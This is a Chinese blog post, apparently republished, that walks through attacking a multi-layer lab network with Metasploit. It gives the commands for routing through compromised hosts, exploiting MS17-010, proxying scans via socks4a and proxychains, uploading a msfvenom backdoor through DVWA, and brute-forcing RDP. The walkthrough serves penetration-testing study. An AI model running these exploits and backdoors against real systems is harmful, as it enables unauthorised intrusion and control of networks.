首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >使用msf入侵多层级网络架构

使用msf入侵多层级网络架构

作者头像
Bypass
发布2020-06-04 16:12:46
8610
发布2020-06-04 16:12:46
举报
文章被收录于专栏:BypassBypassBypass

假设,有一个多层网络环境,每层靶机只与相邻服务器互通,那么,如何从Hack的笔记本层层突破,获取到第4层靶机Server5的系统权限呢?

首先,我们通过Web入侵获得Server1权限,并通过横向渗透到Server2,获悉Server2可连外网、双网卡。在这里,我们以Server2作为攻击跳板机继续入侵。


第1层靶机→第2靶机

1、获取内网网段信息

meterpreter > run get_local_subnets

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 10.0.0.0/255.255.255.0
Local subnet: 10.0.1.0/255.255.255.0

通过内网本地路由查询,可以获悉内网网段地址为:10.0.1.0/24。

2、添加去往第二层内网网段(10.0.1.0/24)的静态路由。

meterpreter > run autoroute -s 10.0.1.0/24

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.0.1.0/255.255.255.0...
[+] Added route to 10.0.1.0/255.255.255.0 via 10.0.0.3
[*] Use the -p option to list all active routes

3、扫描内网主机,使用msf下的扫描模块对IP段进行扫描看是否存来MS17-010漏洞。

use auxiliary/scanner/smb/smb_ms17_010 
show options
set rhosts 10.0.1.0/24
set threads 50
run

通过扫描发现10.0.1.2存在MS-17010漏洞。

4、通过MS-17010漏洞获取Server3的系统权限。

 use exploit/windows/smb/ms17_010_psexec
 set rhost 10.0.1.2
 set payload windows/meterpreter/bind_tcp
 run

第2层靶机→第3靶机

1、添加第三个网段的静态理由。

meterpreter > run autoroute -s 10.0.2.0/24

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.0.2.0/255.255.255.0...
[+] Added route to 10.0.2.0/255.255.255.0 via 10.0.1.2
[*] Use the -p option to list all active routes

2、使用MS17-010扫描无果,发现10.0.2.2主机存活,利用msf搭建socks代理

use auxiliary/server/socks4a
set srvport 9999
run

3、在攻击机Kali中,修改配置文件/etc/proxychains.conf

socks4 10.0.0.2 9999

4、使用proxychains 对第三层靶机进行端口扫描:

proxychains nmap -Pn -sT 10.0.2.2 -p1-1000

5、在Firefox中设置socks代理。

本地就可以直接访问到第三层靶机,在DVWA中,通过任意文件上传msf后门,获取站点权限。

6、利用msfvenom生成木马后门:

msfvenom -p windows/meterpreter/bind_tcp LPORT=8888 -f exe > shell.exe攻击机监听:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST 10.0.2.2
set LPORT 8888
set ExitOnSession false
exploit -j -z

7、在webshell中,上传并成功执行shell.exe,成功返回Server4的权限。

第3层靶机→第4靶机

1、添加第四个网段的静态理由。

meterpreter > run autoroute -s 10.0.3.0/24

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.0.3.0/255.255.255.0...
[+] Added route to 10.0.3.0/255.255.255.0 via 10.0.2.2
[*] Use the -p option to list all active routes

2、使用msf开启socks

use auxiliary/server/socks4a
set srvport 6666
run

3、探测第四个网段存活的主机,发现10.0.3.2 开放了3389端口。

proxychains nmap -Pn -sT 10.0.3.0/24 -p22,80,3389

4、将第四层目标主机的3389流量转发到代理服务器中。

5、在本地对RDP账号密码进行爆破:

6、爆破成功后,使用账号密码成功登录服务器。

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-06-01,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Bypass 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档